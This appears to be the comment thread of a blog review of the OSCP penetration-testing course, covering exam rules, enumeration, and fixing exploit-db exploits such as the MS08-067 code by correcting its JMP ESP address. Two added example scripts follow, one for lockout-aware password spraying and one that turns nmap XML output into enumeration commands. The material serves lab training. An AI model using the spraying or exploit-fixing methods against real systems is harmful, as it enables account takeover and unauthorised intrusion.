      While vulnerability scanners such as Nessus have practical, time-saving application in real-world testing efforts, they are not allowed on the exam and should not be relied upon when performing the lab. The course is designed to ensure you have the skills to identify this same vulnerability information manually and highlights why enumeration and discovery are such a fundamental step in the pen-test process. In terms of how to do it, the lessons on information gathering, recon, and port scanning are key … use nmap to determine open ports and services or telnet/nc to banner grab; what OS is running? what applications and versions are discovered? are there known exploits in exploit-db for any of these? Through these enumeration techniques you will discover vulnerable services and select your payloads accordingly. Hopefully this answers your question.

      – Mike

  23. fei says:

    Nice review and congratulations. I had subscribed to the latest Penetration with Kali and I have learned so much from the course material (BO, Tunnelling, File transfer, etc.). However, things started to change when I moved on to the pentest on hosts in the lab segment.

    Pwning the first few hosts with metasploit is relatively easy but that is not the right way (as the exam does not encourage the use of metasploit) and compiling code from exploitdb/security focus may not be straightforward, especially when it comes to cross-platform compilation (compiling Windows C in a Linux environment). It could be discouraging when I only had 4 hours per day to work on the lab (busy working during the day time), and yet was stuck on getting the exploit from exploitdb/security focus working. I may need to find a hacking buddy on its IRC channel.

    I decided to extend the lab as I could not finish pwning all the hosts in just 30 days.

    The above are based on my knowledge and experience, please do not be discouraged to take on the PWK.

  24. yassine says:

    Mike, thank you for this important resource and information that’s helpful for us as beginners who are preparing for this certification. I have just one other request (and I know we ask you so much 🙁, thank you again for that): could you share with us your study notes, because they seem rich in information? Even if I’m preparing the PWK version of the course, it will be helpful to me. You have my email 🙂

    • Mike Czumak says:

      Unfortunately nearly all of the notes I have are specific to each system in the lab (specific scripts I used for a given target, the steps I took to get root, goodies I found, etc) and I wouldn’t want to share those. If you have a specific question about a topic, I’d be glad to help though. -Mike

  25. Peter says:

    Hi Mike,
    Great post, I must say.

    I am taking the OSCP course as I type.
    I am kinda stuck in finding the “right” exploits in exploit-db & securityfocus. The search term doesn’t always return the right exploits you’re looking for.
    Any piece of advice on improving the search capability?


    • Mike Czumak says:

      Thanks Peter. Regarding searching for exploits, you may be better off using Google, especially if you have limited information about a target software/service. You can always narrow your search to sites like exploit-db by using the Google dork.

  26. Peter says:

    Gotcha. Thanks !

  27. Eric says:

    Mike, this is an awesome post. Thanks for giving back. I just passed the CEH and am now taking this OSCP course. I was trying to get a feel for how the exam was set up or how to approach it. All I do for the company I work for is scan, find vulns, and write a report about how they will affect the system or the environment. We don’t exploit, but I do exploit in my lab. So yes, I do all the recon and identify security problems with systems…. I do a little scripting with bash and python. I’m good at reading others’ scripts and then picking them apart to work as I would like.. I say all of this to ask you or anybody on the blog: is the exam pretty much the way I’ve been explaining how I work? As long as you go through the course, remember how to do things and take good notes, should it be as smooth as the exercises?

    • Mike Czumak says:

      Thanks Eric. Yes, I thought the lab was the perfect prep for the exam. Really the exam is not much different … just fewer machines and the added pressure of a lot less time. If you feel comfortable with the course material and techniques practiced in the lab, take good notes, organize your materials, and develop your plan of attack ahead of time, you should be well prepared for the exam.

  28. Peter says:

    Hi Mike,

    +1 praise for your post. I’ve just finished pwning my way through the labs and will have my exam soon. Your Linux script was very useful, and I’m now adapting your recon scripts to my taste. This is by far the most useful and comprehensive post on OSCP you can find nowadays on the ‘Net.

    I’m also having trouble with exploit-db 7104 (service code exec). It seems to crash Win XP SP3 every time. If you look at the metasploit module for this, there are lots of different cases in there. What did you do to modify it?

    Also, you probably can’t go into detail, but is it worth spending the time compiling the remote exploits? I’ve got all my privilege escalation ones, but I find the remote ones on exploit-db hard to compile, and even when you are able to, they are quite fiddly and only work on certain specific Windows versions.

    BTW, here is the link for the enlightenment exploit pack by spender, which was very useful in the PWK labs to escalate in some Linux machines:

    Thanks and regards!


    • Mike Czumak says:

      Thanks for the feedback Peter, I’m really glad you found the post and scripts useful. Yeah, the remote exploits, including 7104, can definitely be finicky and specific in their targets. In fact, I don’t know that I ended up using 7104 at all, but I was able to successfully compile most others (though I ended up using multiple flavors of Windows to do so). Compiling the privilege escalation scripts was my primary focus as well and certainly proved useful. You may not end up using any, but for me having the remote exploits was good peace of mind as I simply didn’t want to have to deal with troubleshooting a compilation error during the limited exam time frame. That being said, you probably shouldn’t get too hung up on the ones that you can’t compile easily.

      It sounds like you’re doing all of the right things to prep for the exam. Best of luck and thanks for sharing the link to the Linux privesc exploit.

      – Mike

  29. itsmario says:

    Hi Mike,

    I was wondering if usage of provided online rainbow cracker for pwk was allowed during the exam or are we expected to crack passwords on our own?

    • Mike Czumak says:

      The exam instructions you receive will list any restrictions. That being said, I don’t recall there being a restriction for my exam.

  30. Diego says:

    Hi Mike,

    Thanks for your great post!!

    I have a doubt I hope you can help me with. I am thinking about facing this cert. English is not my mother language. I can read English without problem and, usually, I can understand spoken English (it depends a lot on the accent). However, I am a little scared I cannot understand the videos (so far, I’ve been able to follow the one on the Offensive-Security web site). Are the videos really important? I mean, can I learn all the stuff needed just from the pdf guide?

    Thanks a lot.

    • Mike Czumak says:

      Thanks Diego. I must admit I can’t entirely relate to your issue for this course since English is my first language but I hope my response helps. The video posted to the Offsec site is exactly like the videos in the course so if you understand the spoken accent, you should have no problem. A lot of the benefit you will get from the videos is from watching the demos so even if you don’t understand every spoken word I think you’ll still find them useful. I would consider the videos a good supplement to the pdf guide as they sometimes go into more detail and reinforce the written examples. Also keep in mind much of what you get out of the course will also come from your own research outside of the pdfs and videos. – Mike

  31. en says:

    Hi Mike,

    I was wondering if you could share the same information that you shared with gd?
    I’m trying to make the 7104 exploit work and having problems.
    It compiles fine but gives errors when executing it.

    Thanks in advance

    • Mike Czumak says:

      Unfortunately I experienced the same thing — compiled, but errors when executing. I didn’t use that exploit and haven’t yet taken the time to see why it’s failing. Sorry I couldn’t be more help. -Mike

  32. yassine says:

    Hey Mike,
    I am working through the OSCP lab; I got 21 hosts until now. I want to ask you if you could give me a small hint (without spoiling too much) about the two hosts in the IT DEPT. I searched for a direct exploit using the info about the service from nmap enumeration, but no result. I want to run dirbuster against the 2 webservers on the hosts but it’s almost impossible because pivoting made the thing too slow.
    So if you could give some help, I will really appreciate that.

  33. Krautcomputer says:

    Big thanks for this writeup. Especially the insight into how you organised and consolidated the information helped me to get started. I find it quite challenging to keep a clear view of all the vast amounts of info I gather about the targets. I tried a few tools like magictree and armitage. But so far only keepnote met my requirements when it comes to structuring the info (i.e. grouping hosts) at least half.

    What do you use these days to keep host info organised?

    • Mike Czumak says:

      Thanks. Regarding what I use for organization, I’ve developed standard document templates to record my test results and all gathered system info which then translates directly to my standard report template. I tend to work within those documents most of the time (which really helps me to standardize my approach) but I will still use keepnote or even notepad++ as “scratch” paper as I go. I would share the templates but since I developed them for my organization they’re technically not my IP to distribute. – Mike

  34. Ashish says:

    Hey Mike,

    Can you share the notes that you had prepared using keepnote. It would be great..


    • Mike Czumak says:


      The only keepnote notes I’ve maintained are those pertaining to how I rooted each of the machines and those I cannot share.

      – Mike

  35. Melvin Fernandez says:

    Hi Mike,

    Thanks a lot for this great post. I have been searching for quite some time on whether to go ahead with this course. Thanks to you, I will go ahead this month and register for it. I wanted to go for the CEH exam but, as most people say, it’s all theory. Will this examination be too tough for a beginner?

    • Mike Czumak says:

      Thanks Melvin. When I took the OSCP course and exam I did already have quite a bit of experience, but I believe that if you’re willing to put in the time to study and get all that you can out of the course, you’ll have success on the exam. Regardless of whether you pass the exam the first time or not, you will get real value out of the course if you invest the effort. Best of luck.

      – Mike

      • Melvin Fernandez says:

        Hi Mike, thanks for your reply. Could you suggest me any other books / material that could help me in this exam? In the examination do they ask everything from the course they provide? — Melvin

        • Mike Czumak says:

          Melvin, check out my comment from 25 Feb of this year in response to Chris’s question. I do mention some specific recommended resources by topic. Let me know if that helps.

  36. Purushottam Bhandari says:

    Hi Mike/Everyone,

    First, I would like to say a big thanks to Mike and all other contributors. I have been reading your blogs for the last few days and it helped me a lot to clear many of my doubts. As I am a beginner and planning to enroll for PWK, I just want to have your suggestion about the road map to OSCP (I have done CCNA). As I have done CCNA, is jumping into PWK correct or not?
    FYI, I am reading things online; if I can have some study material from you for preparation, that can be a real help and then I can be more prepared and confident. In 1-2 months I will join the PWK course, as I just want to utilize my money and time wisely :-). PLEASE SUGGEST.

    I highly appreciate your suggestions and help with study material…. :-)

    • Mike Czumak says:

      Thanks for the feedback. As far as a road map to the OSCP and preparation for the PWK course, that really depends on your current level of knowledge/experience. I think that the Offsec recommendations are sound — you should have a solid understanding of TCP/IP/networking (which you should have from your CCNA) and familiarity with Linux and Windows OS. Scripting knowledge (bash/python/perl/etc) certainly helps too. Aside from that, take a look at the course syllabus and see if there are things that are completely foreign to you. If so, there are many online and print resources that can help you. Refer to some of my prior comments on this post for specific recommendations. While the OSCP cert is great, I think the real value here is in the quality of the course and the lab. Master the material and the cert will follow. You will get a lot out of it (regardless of your current skill level) as long as you are willing and able to invest the time. Let me know if there are any other questions I might be able to answer for you. Best of luck – Mike

  37. Purushottam Bhandari says:

    Thanks a lot for your helping hand on it. :-)

  38. Ban says:

    Thanks for the time and effort you spent to provide such a great review. In fact, this is the best review I have found so far for this course!

  39. Kylie says:

    Thanks Mike for these scripts, they look great. I’ve changed the hard coding to match my directory structure, but I’m getting a whole heap of Traceback errors. Do you know what could be causing them?

  40. Kylie says:

    I have another quick question, Mike: how long is the script supposed to take to run? Mine never seems to end.

    • Mike Czumak says:

      Thanks for the feedback Kylie. To address both of your questions…if I recall correctly, the last step of the script is the password attack which can run for quite a long time (the reason I made it last). At this point I usually let it run while I review the results from all of the other scripts and formulate the plan of attack. You’ll probably get to the point where you can manually stop the password attack portion of the script. Regarding the traceback errors, I’d have to see them to better understand. I’ve sent you an email so we can communicate directly. -Mike

  41. Miki says:

    Hey Guys,

    Would you be kind enough to send me the PWK Pentest with Kali PDF book?
    And if possible its video files as well.

    Many thanks

  42. Phreak says:

    Hi Mike,

    As you said, the 7104 exploit is compiled with VS 2008, but still after successful compilation there is an error, so my question is: is the 7104 exploit not useful in the PWK labs? Or is there some other available exploit for ms08_067_netapi for Windows XP? And which other exploits should I focus on more?

    Thanks in advance

    • Mike Czumak says:

      I don’t have a vulnerable version of XP handy at the moment to see why it’s failing but if you’re really curious and you have an unpatched OS, you may want to attach a debugger and see if the offsets are correct or if 0x7ffa4512 is even a valid JMP for Win XP EN. If it isn’t but everything else aligns it may be a simple matter of changing the JMP address. If you don’t have the time to investigate I wouldn’t get too hung up on that one vuln. If you need to fall back on Metasploit every once in a while it’s not the end of the world. Btw, Metasploit may also be a means to analyze the exploit and write your own.

    • Mike Czumak says:

      Ok, so I finally took the time to look and confirmed that the published version of Exploit 7104 is not working in Win XP EN because the JMP ESP address used was for a different version. Pick a correct JMP ESP and you should have no problem getting it to work (I’ll leave that exercise up to you). I got it working consistently with Windows XP SP3 EN. – Mike

      • Mark says:

        Using this exploit, did you ever encounter a problem during the connection to the target host?

        I got this error:
        “connect ipc$ …. fixme:mpr:WNetAddConnection2A (0x60fdd4, 0x404122, “”, 0x00000000): stub”

        • Mike Czumak says:

          I seem to recall that error when you try to run the exploit from a Kali machine via Wine. Is that what’s happening here? I’ve run it successfully from a Windows XP machine with no errors.

          • Mark says:

            Good call! The error is triggered when the exploit is run via Wine.

            However I tried to run the exploit via the Windows machine provided in the labs: even if the error is not triggered anymore, it says that it can’t connect to the target machine…(yes, I’m sure that it is vulnerable because I’ve exploited it with metasploit)

          • Mike Czumak says:

            In my experience, this exploit will crash the SMB services on the target machine so it could be that a reboot is required to get it up and running again. You might try it once but I wouldn’t waste too many reboots on it.

  43. Vojkan says:

    I am still struggling with the LAB machines. In your experience, what is the percentage of LAB systems which should be exploited through web application vulnerability?

    Also, thank you for your post.

    • Mike Czumak says:

      For me I think it was between 30 and 40%, though that was before they upgraded the lab so it may be completely different.

  44. kranthi says:

    Hello Mike,

    Your review really helped me in tackling the OSCP labs with more ease & comfort. I am really grateful for such a nice writeup. Currently I am doing the OSCP and it’s going great. I am able to get most of the machines in the public network and was also able to unlock 2 networks, but have yet to try the pivoting stuff.

    Mike, I need some help from you. I am trying to compile the MS05-018 exploit but am getting an error on the “try” function. I tried googling it but could not find a solution for it. Can you help me compile this exploit please, or point to a writeup which explains the error?

    • Mike Czumak says:

      Glad you found the post useful. I’ll try to help with your compile issue. I need to know a couple of things:
      1) Which exploit for MS05-018 are you trying to compile? Is it this one? :
      2) What is the exact error you are receiving?

      I was just able to successfully compile exploit 1198 on a Windows XP SP3 machine using Visual Studio (C:\…VC\bin>cl 1198.c). I initially received two errors like this: “error LNK2019: unresolved external symbol __imp__SendMessageW@16 referenced in function _exploit”. This indicates you are referencing a function in a library you haven’t linked to. I simply had to add the following to get it to compile successfully: #pragma comment(lib, "User32.lib").

      Let me know if this solves the issue or if you have other questions.

      – Mike

  45. kranthi says:

    Hello Mike,

    I am sorry for the late response; I was occupied with the gh0st & Pain machines in the lab. I will follow your suggestions and work my way through. Once again, I am glad that you took the time to help me out.

  46. kranthi says:

    By the way, I was trying to use this ” ” exploit only …. 🙂

  47. C. says:

    Hi Mike, great review. Just wondering which tool you found best for compiling windows exploits for priv esc.


  48. Kranthi says:

    Hi Mike ,

    What’s the best environment to compile most of the exploits you mentioned? Should I set up a VM (like WinXP or Win 7) and install Turbo C so I can compile them and use them as and when required? What do you suggest?

    • Mike Czumak says:

      Sometimes I used wine/gcc on my Kali box but most of the time I used Visual Studio command line (cl.exe) on one of my Windows machines to compile the exploits because that’s what I’m used to.

  49. David says:

    Hey Mike, when the offsec team provides access to the labs nowadays, they give you a virtual machine with Windows 7 and some software, but would you consider (as you commented in past comments) getting my own virtual machine with a Windows OS in order to compile my exploits in Visual Studio? I can’t remember if the virtual machine provided by the offsec team contains Visual Studio.

    Thank you in advance.

    Best regards.

    • Mike Czumak says:


      Since I already had a Windows VM w/ Visual Studio that’s what I used to compile and test my exploits (purely out of convenience). If they do provide a compiler on their VM you may find it unnecessary to get your own, especially if it means incurring an expense.

      – Mike

  50. JK says:

    Hi Mike, great writeup! I just transitioned over from other IT disciplines into security about a year ago and hold the SANS GSEC, GCIA and GCFA certs, but no scripting experience.

    Without scripting knowledge, would you advise against tackling this cert? I really want it, but afraid it would be a wasted attempt if scripting is required to pass.

    • Mike Czumak says:

      Thanks JK. That’s a tough one only because I frequently rely on scripting…not just in the course but professionally as well…it’s hard for me to imagine not using it. Personally, I wouldn’t recommend taking a course like this with absolutely no scripting experience. That being said, you don’t have to be an expert and, depending on your available free time, you may be able to get enough familiarity with scripting in a matter of weeks. I would recommend becoming familiar with bash and another language such as perl or python. Don’t go overboard…if you understand the basics you can build upon it as you go. There are so many free online resources to choose from. Here are a few examples:

      Online training:

      For bash, try watching the first video above and practicing the examples. Take notes of frequently-used commands so you have them to reference as you’re taking the PWK course. For python, try something like code academy to get some hands-on practice of the basics. You can always build upon this as you’re taking the Offsec course but at least you won’t be starting from scratch.

  51. Mew says:

    Hey Mike, I’m doing the PWK course, I’m 1 week into it. I was wondering if you were allowed to use Armitage in the labs or exams, or is that prohibited?

    • Mike Czumak says:

      I didn’t use it but I imagine the rules for Armitage are the same for Metasploit. I could use it in the labs, though I usually didn’t for exploits since there are limitations for use on the exam (and you might as well practice like you’re going to play!)

  52. Manz says:

    Hi Mike,

    Really inspired by your post! I’m considering taking this course next month (after my holiday) and this is a great heads-up. Would be great to talk to you (hence, sending you a LinkedIn request).. Also, I wanted to find out whether you still use the skills learnt in your current position?
    Also, if anyone would like to buddy up for this course, please let me know.. I’m looking at Nov 14

    • Mike Czumak says:

      Thanks. I just accepted your invite. My job is performing pen-tests on a near-daily basis so I definitely use these skills. I’ve been doing this for some years now, but I’m always looking for ways to hone my skills, expand my knowledge, and challenge myself. This course definitely did all three. – Mike

  53. Atul says:

    Thanks Mike for such a wonderful post and scripts!!
    I am fairly new to the Infosec world. Though I have been working as a Security Analyst for the past 6 months and have dreamt every moment of it of having my OSCP, many have suggested that I should get at least a year or two of experience in the field to give my 100% in the exam. I need your suggestion. Should I go for it now or should I get some experience just to decrease my risk of failing?

    • Mike Czumak says:


      Thanks for the comment. I’m never one to dissuade someone from going after a goal so it’d be difficult for me to tell you not to attempt the course. However, there are some of those key skills that you want to ensure you have — namely a familiarity with a Linux and Windows OS environment, some basic scripting skills, and a fundamental knowledge of networking concepts (familiarity with and use of various protocols, difference between UDP & TCP, etc). These basics are the things you don’t want to be struggling with in the course. I’ve posted several resources (both in my post and in the comments) that might help you. You might also consider familiarizing yourself with Kali and the various tools. It may be wise to review the PWK course syllabus and self-assess how familiar you are with some of the concepts. It wouldn’t hurt to do some preparatory reading/research on some of the topics before you attempt the course if you haven’t been involved with security for a while. This may take you a few weeks or a few months, but I would suggest you get the basics down first. That said, I wouldn’t be pressured into waiting a set amount of time. Getting another year or two of experience would be helpful only if that experience could be directly applied to the course. If you feel you’ve mastered the basics after a month or two then you might go for it. Just remember that there’s also no rush to get the cert — the true value of the OSCP is not in the certification but in the completion of the course. Getting the cert is great, but it feels a lot better if at the end you know you’ve learned as much as possible. Offsec gives you all of the basic tools and concepts and it’s up to you to build on them throughout the course. If you have the time and are willing to put in the work, you may not have to wait too long to take the PWK…as long as you’ve learned the basics first.

      Hope this helps.

      – Mike

      • Mew says:

        Hi Mike, I’m 3 weeks into the PWK course and there’s been some confusion on what is allowed in the exam itself. Is msfconsole allowed in the exam? If not, what is allowed in the exam, and how do you do the penetration and exploit without msfconsole? I understand some mass scanners are not allowed. Please, if you can, can you explain to me what the restrictions are and what we can use? The information in the exam was not very clear.

        • Mike Czumak says:

          First, keep in mind that when you take the exam you will receive a written guide that clearly outlines exactly what you can and cannot use and Offsec may change their exam guidelines. With my exam, there were limitations on the use of Metasploit. Keep in mind that Metasploit is much more than just exploits and msfconsole (or msfcli) can be useful for scanning/enumeration and more. In general, I believe that auxiliary scanning with Metasploit is permitted on the exam, though once again that could change so I recommend exploring other methods. I used very little Metasploit during my PWB course. When you believe you’ve found a vulnerability, search for exploit scripts on Exploit-db or other sites and see if you can modify them to suit your needs. It might take some additional effort, but you will learn much more and better prepare yourself for the exam. Regarding vulnerability scanners (Nessus, etc), I recommend not using them during the course. You probably won’t be able to use them on the exam and again, the point of the course is to teach you the various methods of enumeration beyond a point-and-click scanner. Metasploit and nmap can be useful tools for enumeration, however if you write your own scripts you will probably learn a lot more. – Mike

  54. Rob says:

    Any tips for compilation? – I can compile this using the tips above on Windows XP. However I only have the Express Version of Visual Studio 2010 which will not build Windows 2000 exes. So it makes an exe, but if you try your exploit on Win 2000 you get “not a valid Win32 application”. Is there any way round this?

  55. Rob says:

    Yes – I originally tried gcc on Linux, but the __try __except statements are only supported on Microsoft compilers.

  56. Rob says:

    Just tried with Visual Studio Ultimate 2010.

    Same issue – compiles fine, but won’t actually run on a Win 2000 platform. Just checking if you tried it on Win 2000 or just XP? Thanks.

    • Mike Czumak says:

      I haven’t had a chance to try it, but it’s very possible I did not attempt to execute that exploit on a Windows 2000 box. Sorry.

  57. miguelangelo says:

    Hey! Thanks a lot for sharing your enumeration scripts! I have just passed the OSCP exam and your enumeration methodology played a big role. I didn’t use the scripts ‘as is’, but I analysed what your scripts do and used the commands and methodology in them to manually perform my enumeration. So again… thanks !! 🙂

    • Mike Czumak says:

      That’s great! I was reluctant to post those particular scripts because they were hastily coded, single-purpose, and never meant for portability or reuse, but you did exactly as I had hoped and used them merely as a guide to how you might go about enumeration. Awesome job on passing the exam and earning the cert. Best of luck, Mike.

  58. AK says:

    Hi, Mike.

    I have read about 10 OSCP reviews, and yours is the best so far, by far. I thank you for your details and posting your enumeration scripts. I will be sure to model mine after them.

    I just finished with the PWK course manual and videos today, so I’ll begin my actual pen-test of the THINK.local domain in the next day or two. Before I do, I would very much like your advice to better hone my strategy.

    1. I noticed in some screenshots above that you ran DNS enumeration, WHOIS and Google d0xing on some of the targets. I was wondering why the bother. Is not this information only useful if the attacker is unaware of which IPs to test and for social engineering attacks? In our case, we already know which IPs to target, and there is no human to social engineer. Did these information gathering techniques prove of any use to you?

    2. Along the same lines as the first question, I do not suppose we need to worry about launching any client-side attacks or any type of attacks that relies on human interaction (e.g., XSS), right?

    3. Per your advice, I decided to forego the use of Metasploit, vulnerability scanners, etc. However, every machine on the target subnet is vulnerable in some way, right? So, did you find any machine that did not run a service with a publicly known vulnerability? Even if the vulnerability is not published on SecurityFocus or Exploit-DB, it must be discoverable somewhere, right? They would not host a target with a vulnerability so esoteric that it would be next to impossible to find, would they?

    That is all I have for now. Thanks much again for your review and your feedback.

    • Mike Czumak says:

      Thanks for the feedback AK, I’m glad you found the post useful. Regarding your questions:

      1) Those were simply notes from the course. There was no reason to perform any external WHOIS/Google searching on these internal test networks. DNS enum on the other hand is helpful as you will probably see when you begin your enumeration on the internal lab network(s).
      2) Not necessarily. Offsec is pretty clever in its use of possible exploits. I would not rule anything out — even attacks that would typically require user interaction.
      3) Yes, every machine is vulnerable in some way — discovery and exploitation will be a combination of enumeration, Google searching, and critical thinking.

      – Mike

  59. AK says:

    Thanks so much for your responses to my previous questions, Mike.

    I am currently working my way through porting your enumeration scripts to my own, and I had some additional questions about your tactics.

    1. I noticed that, after your main Nmap scan, you only follow up with enumeration of services discovered on TCP ports. Why not UDP ports as well?

    2. I see you also exported your main Nmap scan into an XML file (-oX). Did you find this of any use? I examined a few XML exports in both Notepad++ and MS Excel, and I do not really see any additional value in this over the general (-oN) exports. How exactly did these provide extra help to you?

    3. I read some posts above with questions about password brute-force attacks, and I was a bit concerned with one of the course exercises that asks you to launch an online password attack without locking out any user accounts. Now, these two goals seem contradictory to me. If a machine has an account lockout policy, it cannot be brute-forced (within any reasonable time limits), right? Did you do any online password attacks when you did the course?

    • Mike Czumak says:

      Regarding your questions:
      1) I did UDP enumeration as well. I may not have left it in the posted script but you can easily add it. Just note that by its nature, UDP scanning can take considerably longer so you may want to be conservative in your port ranges.

      2) I used the xml file for Zenmap (which I sometimes use for large networks). If you want a graphical display of your scan output you may give it a try.

      3) You always have to be aware of potential brute-force protections when performing a password attack. Depending on the application, you may have to consider timing, # of attempts (per account and/or per IP), or both. If you were testing an Enterprise application like OWA and had thousands of accounts at your disposal, you might try a password guessing attack from multiple IPs, attempting only 2-3 of the most common passwords for each, with some additional timing factors. I didn’t encounter anything of this scale in the course, though I do recall at least one dictionary-based password attack on a much smaller scale.
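The reply above describes a password-guessing attack shaped by the target's lockout policy (few attempts per account, spread across accounts, with timing in between). As an added example that is not part of the original post, the script below models that scheduling logic. The lockout policy, the account list, the password list and the in-memory credential store are all constructed for the demo; against a real service the `try_login` callback would wrap the actual authentication request, and the policy values would come from recon of the target (or from the conservative defaults a tester picks when they are unknown).

```python
"""Lockout-aware online password guessing.

Added example, not code from the original post. It models the two controls
mentioned in the reply above: a per-account attempt budget inside a lockout
observation window, and rotating one password across all accounts per pass.
The target is a constructed in-memory credential store, so this runs offline;
against a real service, try_login would wrap the actual authentication call.
"""
import time
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass
class LockoutPolicy:
    threshold: int          # failed attempts that trigger a lockout
    window_seconds: float   # how long the target counts failures
    safety_margin: int = 1  # stay this many attempts below the threshold


class SprayScheduler:
    """Tracks attempts per account and says whether another one is safe."""

    def __init__(self, policy, clock=time.monotonic):
        self.policy = policy
        self.clock = clock
        self.history = defaultdict(deque)   # account -> timestamps of attempts

    def attempts_in_window(self, account, now):
        hist = self.history[account]
        while hist and now - hist[0] >= self.policy.window_seconds:
            hist.popleft()                  # expired attempts no longer count
        return len(hist)

    def can_attempt(self, account, now=None):
        now = self.clock() if now is None else now
        budget = self.policy.threshold - self.policy.safety_margin
        return self.attempts_in_window(account, now) < budget

    def record(self, account, now=None):
        now = self.clock() if now is None else now
        self.history[account].append(now)


def spray(accounts, passwords, try_login, scheduler, clock=time.monotonic):
    """Try each password against every account before moving to the next
    password, so no single account absorbs many attempts in one window.
    Returns (found, skipped): successes as {account: password}, and the
    (account, password) pairs deferred because the account's budget was spent."""
    found, skipped = {}, []
    for password in passwords:
        for account in accounts:
            if account in found:
                continue
            now = clock()
            if not scheduler.can_attempt(account, now):
                skipped.append((account, password))
                continue
            scheduler.record(account, now)
            if try_login(account, password):
                found[account] = password
    return found, skipped


class FakeClock:
    """Constructed clock so the demo is instant and deterministic."""

    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


# Constructed target standing in for OWA, SSH, a web login, etc.
DEMO_CREDENTIALS = {"alice": "Winter2015!", "bob": "Summer2015!"}
DEMO_ACCOUNTS = ["alice", "bob"]
DEMO_PASSWORDS = ["Password1", "Winter2015!", "Summer2015!", "Welcome1"]


def demo_login(account, password):
    return DEMO_CREDENTIALS.get(account) == password


def run_demo():
    """Policy: lockout after 3 failures in 10 minutes, so at most 2 tries per
    account per window. Deferred pairs are retried once the window has passed."""
    clock = FakeClock()
    policy = LockoutPolicy(threshold=3, window_seconds=600, safety_margin=1)
    sched = SprayScheduler(policy, clock=clock)
    found, skipped = spray(DEMO_ACCOUNTS, DEMO_PASSWORDS, demo_login, sched, clock)

    clock.advance(policy.window_seconds)      # wait out the lockout window
    deferred = defaultdict(list)
    for account, password in skipped:
        deferred[account].append(password)
    for account, pws in deferred.items():
        more, _ = spray([account], pws, demo_login, sched, clock)
        found.update(more)
    return found, skipped


if __name__ == "__main__":
    print(run_demo())
```

In the demo, alice is found on the second pass but bob's two remaining passwords are deferred rather than tried, because a third attempt inside the window would risk the lockout; they succeed only after the clock moves past the window. Per-IP limits would be handled the same way with a second scheduler keyed on source address.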

  60. Tov says:

    Hello Mike, please, I need your advice on how to pass this exam. I want to discuss some aspects of the exam. I met some challenges and I couldn’t go any further after I had grabbed about 55 points. I want to retake the exam but I have some machines I need advice on. Please write me.

  61. bman says:

    Hi Mike,

    Are we allowed to use the nmap NSE scripts during the exam?

    • Mike Czumak says:

      Typically enumeration scripts are allowed, and I don’t recall any specific limitations on nmap scripts. There are limitations on automated vulnerability scanning (such as Nessus). I would caution that things may have changed since I took the exam, but the instructions will clearly spell it out for you.
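Two threads above touch the same practical point: the `-oX` XML output AK asked about, and enumeration scripts (nmap NSE included) being the allowed way to go beyond a point-and-click scanner. The XML format is the one meant for programs to consume, and the usual thing to do with it is to feed each open port into the next enumeration step automatically. The script below is an added example, not Mike's enumeration script and not from the post; the nmap XML is constructed to look like a TCP+UDP scan of one host on a documentation address (192.0.2.10), and the follow-up commands are ordinary nmap NSE and Kali tool invocations chosen as illustration of the mapping, not a complete methodology.

```python
"""Drive follow-up enumeration from nmap's -oX output.

Added example, not Mike's enumeration script. nmap's XML output is the form
meant for programs to read (the -oN text is for people), so a wrapper script
can pull out every open TCP and UDP port and emit the next command for each
service. The XML below is constructed to look like a scan of one host on a
documentation address; the follow-up commands are ordinary nmap NSE and
Kali tool invocations picked for illustration.
"""
import xml.etree.ElementTree as ET
from collections import namedtuple

Service = namedtuple("Service", "host proto port name product version")

# Constructed scan of a single host (TEST-NET address, not a lab target).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sU -sV -p T:1-1000,U:53,123,161 -oX scan.xml 192.0.2.10">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd" version="2.0.8"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd" version="2.2.8"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn" product="Samba smbd"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="netbios-ssn" product="Samba smbd" version="3.X"/></port>
      <port protocol="tcp" portid="8080"><state state="closed"/><service name="http-proxy"/></port>
      <port protocol="udp" portid="161"><state state="open"/><service name="snmp"/></port>
      <port protocol="udp" portid="123"><state state="open|filtered"/><service name="ntp"/></port>
    </ports>
  </host>
</nmaprun>
"""

# (protocol, nmap service name) -> follow-up command templates
FOLLOW_UPS = {
    ("tcp", "ftp"): ["nmap -p {port} --script ftp-anon,ftp-syst {host}"],
    ("tcp", "http"): ["nikto -h http://{host}:{port}",
                      "dirb http://{host}:{port}"],
    ("tcp", "netbios-ssn"): ["enum4linux -a {host}",
                             "nmap -p {port} --script smb-os-discovery {host}"],
    ("udp", "snmp"): ["snmpwalk -c public -v1 {host}",
                      "onesixtyone -c community.txt {host}"],
}


def parse_nmap_xml(xml_text, include_open_filtered=False):
    """Return a Service for every open port. UDP ports nmap cannot tell apart
    from filtered ones ('open|filtered') are skipped unless asked for."""
    wanted = {"open"}
    if include_open_filtered:
        wanted.add("open|filtered")
    services = []
    for host in ET.fromstring(xml_text).findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for port in host.findall("ports/port"):
            if port.find("state").get("state") not in wanted:
                continue
            svc = port.find("service")
            attrs = svc.attrib if svc is not None else {}
            services.append(Service(addr.get("addr"), port.get("protocol"),
                                    int(port.get("portid")), attrs.get("name", ""),
                                    attrs.get("product", ""), attrs.get("version", "")))
    return services


def follow_up_commands(services):
    """Expand the templates; host-wide commands (enum4linux) are emitted once."""
    seen, commands = set(), []
    for s in services:
        for template in FOLLOW_UPS.get((s.proto, s.name), []):
            cmd = template.format(host=s.host, port=s.port)
            if cmd not in seen:
                seen.add(cmd)
                commands.append(cmd)
    return commands


if __name__ == "__main__":
    import sys
    xml_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    services = parse_nmap_xml(xml_text)
    for s in services:
        print("%s/%d %s %s %s" % (s.proto, s.port, s.name, s.product, s.version))
    print("\n".join(follow_up_commands(services)))
```

Run it as `python enum.py scan.xml` against a real `-oX` file. Two details matter in practice: the UDP `open|filtered` state is excluded by default because nmap could not distinguish an open port from a dropped probe, so those ports deserve a targeted probe (or an NSE script) before any time is spent on them; and the same `nmap -sU` limitation is why the reply above suggests keeping UDP port ranges small.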

